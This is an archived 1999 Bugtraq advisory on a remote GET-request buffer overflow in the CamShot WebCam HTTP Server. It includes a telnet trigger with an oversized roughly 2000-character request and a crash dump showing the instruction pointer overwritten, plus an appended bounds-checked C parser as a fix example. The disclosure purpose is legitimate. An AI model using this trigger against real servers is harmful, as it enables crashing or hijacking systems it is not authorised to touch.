Bugtraq mailing list archives
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT
From: labs () USSRBACK COM (Ussr Labs)
Date: Thu, 30 Dec 1999 14:06:16 -0300
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT

USSR Advisory Code: USSR-99028

Release Date: December 30, 1999 [4/5]

Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly other versions.

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages containing time stamped images captured from a video camera. The images can be viewed from anywhere on the network with a web browser. CamShot works with Video For Windows compatible video equipment. Finally a cheap and simple way to do remote surveillance is here!

THE PROBLEM

UssrLabs found a Local / Remote Buffer overflow. The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is don't you? http://www.w00w00.org/advisories.html

Example

    [hell@imahacker]$ telnet die.communitech.net 80
    Trying example.com...
    Connected to die.communitech.net
    Escape character is '^]'.
    GET (buffer) HTTP/1.1 <enter><enter>

Where [buffer] is approx. 2000 characters. At this point the server overflows.

And on the remote machine someone will see something like this.

    CAMSHOT caused an invalid page fault in
    module <unknown> at 0000:61616161.
    Registers:
    EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
    EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
    ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
    EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
    Bytes at CS:EIP:

    Stack dump:
    bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
    005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Binary or source for this Exploit (when we finish it):
http://www.ussrback.com/

Vendor Status:
Informed.

Vendor Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm

Credit: USSRLABS

SOLUTION
Nothing yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com
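
The advisory attributes the crash to an unchecked buffer in the GET handler. The following is an added example, not code from the advisory, USSR Labs or the vendor, showing a request-line parser that measures the target before copying it and answers 414 when it does not fit. The function names, the 255-byte limit and the sample request are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 255   /* assumed cap on the request target; not from the advisory */

/* Parse "GET <target> HTTP/1.x" from req_len received bytes.
 * Returns an HTTP status: 200 ok, 400 malformed, 414 target too long,
 * 501 other method. out is written only when the target fits in out_cap. */
int parse_get_line(const char *req, size_t req_len, char *out, size_t out_cap)
{
    const char *nl, *sp;
    size_t line_len, target_len;

    if (out_cap == 0) return 400;
    out[0] = '\0';
    nl = memchr(req, '\n', req_len);          /* never scan past received bytes */
    if (nl == NULL) return 400;
    line_len = (size_t)(nl - req);
    if (line_len > 0 && req[line_len - 1] == '\r') line_len--;
    if (line_len < 4 || memcmp(req, "GET ", 4) != 0) return 501;
    req += 4;
    line_len -= 4;
    sp = memchr(req, ' ', line_len);          /* target ends at the next space */
    if (sp == NULL || sp == req) return 400;
    target_len = (size_t)(sp - req);
    /* Measure first, copy second: reject instead of truncating or overflowing. */
    if (target_len > MAX_TARGET || target_len >= out_cap) return 414;
    if (line_len - target_len - 1 != 8 || memcmp(sp + 1, "HTTP/1.", 7) != 0)
        return 400;
    memcpy(out, req, target_len);
    out[target_len] = '\0';
    return 200;
}

/* Constructed sample: a GET whose target is n 'a' bytes. */
int status_for_target_len(size_t n)
{
    static char req[4096];
    char out[MAX_TARGET + 1];

    if (n + 17 > sizeof req) return -1;
    memcpy(req, "GET ", 4);
    memset(req + 4, 'a', n);
    memcpy(req + 4 + n, " HTTP/1.1\r\n\r\n", 13);
    return parse_get_line(req, n + 17, out, sizeof out);
}

int main(void)
{
    printf("11 bytes: %d, 2000 bytes: %d\n",
           status_for_target_len(11), status_for_target_len(2000));
    return 0;
}
```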